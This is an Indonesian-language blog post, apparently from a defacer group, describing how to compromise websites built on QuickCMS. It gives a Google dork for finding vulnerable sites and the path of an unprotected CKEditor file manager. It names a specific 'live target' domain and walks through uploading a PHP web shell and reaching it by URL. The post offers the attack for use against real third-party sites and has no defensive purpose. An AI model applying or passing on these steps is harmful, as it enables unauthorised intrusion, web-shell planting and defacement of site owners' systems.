Setelah ditelusuri kini saya menemukan bug pada Website yang memakai QuickCMS .
Google dork : "CMS by Quick.Cms - Designed by BITIS & BELLA BITIS" site:use ur brain
Exploit : site.com/plugins/ckeditor/filemanager/bitis.html
Location file : /plugins/ckeditor/filemanager/[path]/shell.php
Step :
1. Dorking menggunakan dork diatas .
2. Pilih salah satu target .
-Live target fresh : http://duroyaumedholi.eu/
3. Langsung saja masukkan exploit nya dan akan tampil Filemanager dari QuickCMS ini
Lihat gambar dibawah . (http://duroyaumedholi.eu//plugins/ckeditor/filemanager/bitis.html)
4. Tinggal Upload shell kalian tanpa pusing membypass extensi nya langsung saja upload
shell.php
5. Akses http://duroyaumedholi.eu//plugins/ckeditor/filemanager/files/nazwij_folder/shell.php
Thank you for Black Illusion Security <3
x404.hz - JBRXXX - MHR27 - Mr.W42N 1D - 5AR!US4D - Gboys_flush - Raka_3rOOt - XenUx_404 - grey
Thank you for all defacer indonesia for u support ...
Author : ./Mr.Rtp007
0 Komentar